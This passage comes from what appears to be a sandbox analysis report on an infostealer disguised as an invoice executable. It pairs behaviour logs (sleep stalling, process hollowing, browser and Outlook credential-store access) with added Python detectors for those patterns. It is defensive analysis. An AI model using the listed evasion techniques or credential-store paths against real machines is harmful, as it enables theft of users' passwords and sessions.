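# Constructed sample: an excerpt of the report's own lines, in report order.
EXE = r"Source: C:\Users\user\Desktop\Factura 1-2501377.exe "
SAMPLE_LINES = [EXE + s + " Jump to behavior" for s in (
    "Memory allocated: 15B0000 memory reserve | memory write watch",
    "Memory allocated: 2ED0000 memory reserve | memory write watch",
    "Memory allocated: 4ED0000 memory reserve | memory write watch",
    "Thread delayed: delay time: 922337203685477",
    "Thread delayed: delay time: 922337203685477",
    *[f"Thread delayed: delay time: {ms}" for ms in (
        600000, 599874, 599765, 599656, 599546, 599437,
        599328, 599218, 599109, 598999, 598890, 598781)],
    "TID: 6436 Thread sleep time: -922337203685477s >= -30000s",
    "TID: 3452 Thread sleep count: 32 > 30",
    "TID: 3452 Thread sleep time: -600000s >= -30000s",
    "TID: 3452 Thread sleep time: -599874s >= -30000s",
    "TID: 3644 Thread sleep count: 8289 > 30",
)]


def parse(lines):
    """Extract sleep arguments, write-watch reservations and per-thread sleep stats."""
    delays, regions = [], []
    per_tid = defaultdict(lambda: {"sleeps": [], "count": 0})
    for line in lines:
        if m := DELAY_RE.search(line):
            delays.append(int(m.group(1)))
        elif m := WRITE_WATCH_RE.search(line):
            regions.append(int(m.group(1), 16))
        elif m := TID_RE.search(line):
            tid, ms, count = m.groups()
            if ms is not None:
                per_tid[tid]["sleeps"].append(int(ms))
            else:
                per_tid[tid]["count"] = max(per_tid[tid]["count"], int(count))
    return delays, regions, dict(per_tid)


def longest_countdown(delays):
    """Longest run in which every sleep asks for slightly less than the one before.
    A loop that recomputes `deadline - now` on each pass yields exactly this when the
    sandbox shortens the real sleep: the argument shrinks by the time that actually
    elapsed per iteration (about 110 ms here), so skipping sleeps saves nothing."""
    best, run = {"length": 0}, []
    for ms in (d for d in delays if d != INFINITE_MS):
        run = run + [ms] if run and 0 < run[-1] - ms <= MAX_STEP_MS else [ms]
        if len(run) > best["length"]:
            step = (run[0] - run[-1]) / (len(run) - 1) if len(run) > 1 else 0.0
            best = {"length": len(run), "start_ms": run[0], "end_ms": run[-1],
                    "mean_step_ms": round(step, 1)}
    return best


def assess(lines, dotnet_sample=True):
    """Turn the parsed facts into findings.  dotnet_sample=True because the report's
    decompiled .cs classes mark the sample as .NET, whose GC reserves its heap
    segments with MEM_WRITE_WATCH as a matter of course."""
    delays, regions, per_tid = parse(lines)
    finite = [d for d in delays if d != INFINITE_MS]
    f = {
        "infinite_sleeps": len(delays) - len(finite),
        "long_sleeps": sum(d >= LONG_SLEEP_MS for d in finite),
        "write_watch_regions": len(regions),
        "countdown": longest_countdown(delays),
        "sleeping_threads": sorted(per_tid),
        "notes": [],
    }
    if f["write_watch_regions"] and dotnet_sample:
        f["notes"].append("write-watch reservations match the .NET GC's own heap "
                          "allocation; not evidence of evasion by themselves")
    cd = f["countdown"]
    if cd["length"] >= MIN_COUNTDOWN:
        f["notes"].append(f"stalling loop: {cd['length']} sleeps counting down from "
                          f"{cd['start_ms']} ms in ~{cd['mean_step_ms']} ms steps; "
                          "skipping the sleeps does not shorten it, only a faked clock does")
    if f["infinite_sleeps"]:
        f["notes"].append("infinite wait: a thread parked until something else wakes it")
    return f


if __name__ == "__main__":
    for key, value in assess(SAMPLE_LINES).items():
        print(f"{key}: {value}")
```

Run it against the full block by pasting the report lines into SAMPLE_LINES; the countdown detector then reports the whole 600000 to 594468 run, and the per-thread view shows TID 3452 doing the countdown while TID 6436 holds the infinite wait. The "VMware20,11696494690" memory strings listed next are a different case: they trail site names and login-page titles (ms.portal.azure.com, outlook.office.com, interactivebrokers.com), which is the shape of saved-login records read out of a browser profile, and the anti-VM signature appears to fire on the "VMware" substring alone; read them together with the browser-credential theft findings rather than as proof of VM detection.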
Source: Factura 1-2501377.exe, 00000004.00000002.3338879017.000000000116A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllem(
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.00000000042A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.00000000042A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696494690f
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.00000000042A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696494690
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.00000000042A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696494690s
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.00000000042A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.00000000042A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.00000000042A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.00000000042A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.00000000042A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.00000000042A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.00000000042A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.00000000042A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.00000000042A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.00000000042A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.00000000042A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.00000000042A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.00000000042A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.00000000042A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.00000000042A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696494690o
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.00000000042A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.00000000042A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.00000000042A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696494690j
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.00000000042A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696494690
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.00000000042A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.00000000042A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.00000000042A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.00000000042A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.00000000042A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.00000000042A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.00000000042A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: Factura 1-2501377.exe, 00000004.00000002.3343087060.00000000042A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A09668 LdrInitializeThunk, 4_2_05A09668
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\Factura 1-2501377.exe Memory written: C:\Users\user\Desktop\Factura 1-2501377.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process created: C:\Users\user\Desktop\Factura 1-2501377.exe "C:\Users\user\Desktop\Factura 1-2501377.exe" Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process created: C:\Users\user\Desktop\Factura 1-2501377.exe "C:\Users\user\Desktop\Factura 1-2501377.exe" Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process created: C:\Users\user\Desktop\Factura 1-2501377.exe "C:\Users\user\Desktop\Factura 1-2501377.exe" Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Queries volume information: C:\Users\user\Desktop\Factura 1-2501377.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Queries volume information: C:\Users\user\Desktop\Factura 1-2501377.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
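The first four lines of this section show the sample launching a second copy of its own image and then writing a buffer that begins with 4D5A (the "MZ" DOS header) into that copy at base 0x400000, the default image base of 32-bit and most .NET executables. A PE image written into a freshly spawned copy of the parent is the RunPE / process-hollowing shape typical of .NET loader stubs. The Python below is an added detection example written for this page, not Joe Sandbox code and not part of the report: it parses behaviour lines in this report's format, pairs MZ writes with same-image self-spawns, and leaves two constructed benign control lines (marked in the code, not in the report) unflagged. The MITRE ATT&CK mapping and the control lines are the editor's assumptions.

```python
import re

# Behaviour lines copied from the HIPS / PFW section of this report (the MZ
# write and the three identical self-spawns), followed by two CONSTRUCTED
# benign lines that are not in the report, so the rule has a negative case.
REPORT_LINES = [
    r"Source: C:\Users\user\Desktop\Factura 1-2501377.exe Memory written: C:\Users\user\Desktop\Factura 1-2501377.exe base: 400000 value starts with: 4D5A Jump to behavior",
    r'Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process created: C:\Users\user\Desktop\Factura 1-2501377.exe "C:\Users\user\Desktop\Factura 1-2501377.exe" Jump to behavior',
    r'Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process created: C:\Users\user\Desktop\Factura 1-2501377.exe "C:\Users\user\Desktop\Factura 1-2501377.exe" Jump to behavior',
    r'Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process created: C:\Users\user\Desktop\Factura 1-2501377.exe "C:\Users\user\Desktop\Factura 1-2501377.exe" Jump to behavior',
    # constructed control lines (not from the report): a normal child launch and
    # a memory write whose first bytes are not a DOS header
    r'Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\notepad.exe "C:\Windows\System32\notepad.exe" Jump to behavior',
    r"Source: C:\Windows\System32\notepad.exe Memory written: C:\Windows\System32\notepad.exe base: 1A2B3C40 value starts with: 00000000 Jump to behavior",
]

PROC_CREATE = re.compile(
    r'^Source: (?P<parent>.+?) Process created: (?P<child>.+?) "(?P<cmdline>[^"]*)"'
)
MEM_WRITE = re.compile(
    r"^Source: (?P<writer>.+?) Memory written: (?P<target>.+?) "
    r"base: (?P<base>[0-9A-Fa-f]+) value starts with: (?P<value>[0-9A-Fa-f]+)"
)

# 0x00400000 is the default image base of 32-bit (and most .NET) executables;
# a PE written there into a freshly created copy is the RunPE/hollowing shape.
CLASSIC_IMAGE_BASE = 0x400000


def is_pe_header(value_hex):
    """True when the written bytes start with the DOS magic 'MZ' (4D 5A)."""
    return value_hex.upper().startswith("4D5A")


def parse_events(lines):
    """Turn report lines into event dicts; lines of any other kind are ignored."""
    events = []
    for line in lines:
        m = PROC_CREATE.match(line)
        if m:
            events.append({"kind": "create", **m.groupdict()})
            continue
        m = MEM_WRITE.match(line)
        if m:
            d = m.groupdict()
            d["base"] = int(d["base"], 16)
            events.append({"kind": "write", **d})
    return events


def find_hollowing(lines):
    """Flag PE images written into a process, enriched with how many times the
    target image was spawned as a copy of its own parent."""
    events = parse_events(lines)
    self_spawns = {}
    for e in events:
        if e["kind"] == "create" and e["parent"].lower() == e["child"].lower():
            key = e["child"].lower()
            self_spawns[key] = self_spawns.get(key, 0) + 1
    findings = []
    for e in events:
        if e["kind"] != "write" or not is_pe_header(e["value"]):
            continue
        findings.append({
            # ATT&CK mapping is the editor's assumption, not report output
            "technique": "T1055.012 Process Hollowing (PE image written into a process)",
            "writer": e["writer"],
            "target": e["target"],
            "base": e["base"],
            "classic_image_base": e["base"] == CLASSIC_IMAGE_BASE,
            "self_spawned_copies": self_spawns.get(e["target"].lower(), 0),
        })
    return findings


if __name__ == "__main__":
    for f in find_hollowing(REPORT_LINES):
        print(f"{f['technique']}: {f['writer']} -> {f['target']} @ {f['base']:#x} "
              f"(classic base: {f['classic_image_base']}, self-spawns: {f['self_spawned_copies']})")
```

Run on the lines above it yields a single finding for the sample: an MZ-prefixed write at 0x400000 into an image that was self-spawned three times. The same pairing (same-image child plus a cross-process write whose first bytes are MZ) is what to look for in EDR telemetry, since a child created suspended, unmapped and rewritten looks identical to its parent on disk.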

Stealing of Sensitive Information

Source: Yara match File source: 00000004.00000002.3340632815.0000000003021000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 4.2.Factura 1-2501377.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Factura 1-2501377.exe.46d9990.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Factura 1-2501377.exe.471d7b0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Factura 1-2501377.exe.471d7b0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Factura 1-2501377.exe.46d9990.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.3338165117.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.885422652.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Factura 1-2501377.exe PID: 6324, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Factura 1-2501377.exe PID: 6736, type: MEMORYSTR
Source: Yara match File source: 4.2.Factura 1-2501377.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Factura 1-2501377.exe.46d9990.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Factura 1-2501377.exe.471d7b0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Factura 1-2501377.exe.471d7b0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Factura 1-2501377.exe.46d9990.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.3338165117.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.885422652.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Factura 1-2501377.exe PID: 6324, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Factura 1-2501377.exe PID: 6736, type: MEMORYSTR
Source: C:\Users\user\Desktop\Factura 1-2501377.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\ Jump to behavior
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: Yara match File source: 4.2.Factura 1-2501377.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Factura 1-2501377.exe.46d9990.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Factura 1-2501377.exe.471d7b0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Factura 1-2501377.exe.471d7b0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Factura 1-2501377.exe.46d9990.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.3338165117.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.885422652.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Factura 1-2501377.exe PID: 6324, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Factura 1-2501377.exe PID: 6736, type: MEMORYSTR
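The file and registry accesses listed in this section are the sample's credential-harvesting pass: the Chromium profile databases of Chrome and Edge (Login Data holds saved passwords, Web Data autofill and payment data, Network\Cookies session cookies, History and Top Sites browsing history), the Postbox mail-client profile directory, and the Outlook MAPI profile key under Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676, where account settings are kept. The decisive detection signal is not the path but the accessor: these stores are normally opened only by the browser or mail client that owns them. The Python below is an added example written for this page, not part of the report: it classifies each opened object against that table, derives the expected owning process from the path, and reports any other process that reaches saved credentials or sweeps two or more store categories. The owner executable names and the one benign control line are assumptions.

```python
import re
from collections import defaultdict
from ntpath import basename

# "File opened" / "Key opened" lines copied from this section of the report,
# plus one CONSTRUCTED control line (not in the report) in which Chrome itself
# opens its own password store, which the rule must not flag.
REPORT_LINES = [
    r"Source: C:\Users\user\Desktop\Factura 1-2501377.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior",
    r"Source: C:\Users\user\Desktop\Factura 1-2501377.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior",
    r"Source: C:\Users\user\Desktop\Factura 1-2501377.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior",
    r"Source: C:\Users\user\Desktop\Factura 1-2501377.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior",
    r"Source: C:\Users\user\Desktop\Factura 1-2501377.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior",
    r"Source: C:\Users\user\Desktop\Factura 1-2501377.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior",
    r"Source: C:\Users\user\Desktop\Factura 1-2501377.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites Jump to behavior",
    r"Source: C:\Users\user\Desktop\Factura 1-2501377.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior",
    r"Source: C:\Users\user\Desktop\Factura 1-2501377.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\ Jump to behavior",
    r"Source: C:\Users\user\Desktop\Factura 1-2501377.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior",
    # constructed control line (not in the report): the browser reading its own store
    r"Source: C:\Program Files\Google\Chrome\Application\chrome.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior",
]

OPENED = re.compile(
    r"^Source: (?P<proc>.+?) (?P<kind>File|Key) opened: (?P<obj>.+?)(?: Jump to behavior)?$"
)

# Chromium profile layout shared by Chrome and Edge: <vendor>\User Data\<profile>\...
CHROMIUM = r"\\(google\\chrome|microsoft\\edge)\\user data\\[^\\]+\\"
STORES = [  # (pattern over the lower-cased path, description, category)
    (re.compile(CHROMIUM + r"login data$"), "Chromium Login Data (saved passwords)", "browser_credentials"),
    (re.compile(CHROMIUM + r"web data$"), "Chromium Web Data (autofill, payment cards)", "browser_autofill"),
    (re.compile(CHROMIUM + r"network\\cookies$"), "Chromium cookie store (session tokens)", "browser_cookies"),
    (re.compile(CHROMIUM + r"(history|top sites)$"), "Chromium browsing history", "browser_history"),
    (re.compile(r"\\appdata\\roaming\\postboxapp\\profiles\\$"), "Postbox mail profile directory", "mail_profile"),
    (re.compile(r"^hkey_current_user\\software\\microsoft\\windows nt\\currentversion\\"
                r"windows messaging subsystem\\profiles\\outlook\\9375cff0413111d3b88a00104b2a6676$"),
     "Outlook MAPI profile key (account settings)", "mail_profile"),
]

# Path marker -> executable that legitimately owns the store (assumed names).
OWNERS = [
    ("google\\chrome", "chrome.exe"),
    ("microsoft\\edge", "msedge.exe"),
    ("postboxapp", "postbox.exe"),
    ("\\outlook\\", "outlook.exe"),
]


def expected_owner(path_lower):
    for marker, exe in OWNERS:
        if marker in path_lower:
            return exe
    return None


def classify_access(lines):
    """One finding per opened object that is a known credential/profile store."""
    findings = []
    for line in lines:
        m = OPENED.match(line)
        if not m:
            continue
        obj = m.group("obj")
        obj_lower = obj.lower()
        for pattern, store, category in STORES:
            if pattern.search(obj_lower):
                proc = m.group("proc")
                findings.append({
                    "process": proc,
                    "object": obj,
                    "store": store,
                    "category": category,
                    # the owning application reading its own store is normal
                    "owner_access": basename(proc).lower() == expected_owner(obj_lower),
                })
                break
    return findings


def stealer_candidates(findings):
    """Non-owner processes that reach saved credentials, or sweep two or more
    store categories, which is the breadth an infostealer shows."""
    by_proc = defaultdict(set)
    for f in findings:
        if not f["owner_access"]:
            by_proc[f["process"]].add(f["category"])
    return {p: sorted(c) for p, c in by_proc.items()
            if "browser_credentials" in c or len(c) >= 2}


if __name__ == "__main__":
    for proc, cats in stealer_candidates(classify_access(REPORT_LINES)).items():
        print(f"{proc}: {', '.join(cats)}")
```

On the lines above, the sample is the only candidate and it touches all five categories (browser credentials, autofill, cookies, history and a mail profile) while the constructed chrome.exe access is ignored. The same owner-versus-accessor rule transfers directly to file-access telemetry from EDR or Sysmon, where a non-browser process opening Login Data is a high-confidence signal on its own.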

Remote Access Functionality

Source: Yara match File source: 00000004.00000002.3340632815.0000000003021000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 4.2.Factura 1-2501377.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Factura 1-2501377.exe.46d9990.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Factura 1-2501377.exe.471d7b0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Factura 1-2501377.exe.471d7b0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Factura 1-2501377.exe.46d9990.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.3338165117.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.885422652.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Factura 1-2501377.exe PID: 6324, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Factura 1-2501377.exe PID: 6736, type: MEMORYSTR
Source: Yara match File source: 4.2.Factura 1-2501377.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Factura 1-2501377.exe.46d9990.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Factura 1-2501377.exe.471d7b0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Factura 1-2501377.exe.471d7b0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Factura 1-2501377.exe.46d9990.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000002.3338165117.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.885422652.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Factura 1-2501377.exe PID: 6324, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Factura 1-2501377.exe PID: 6736, type: MEMORYSTR
[Map legend: No. of IPs < 25%; 25% to 50%; 50% to 75%; 75% and above]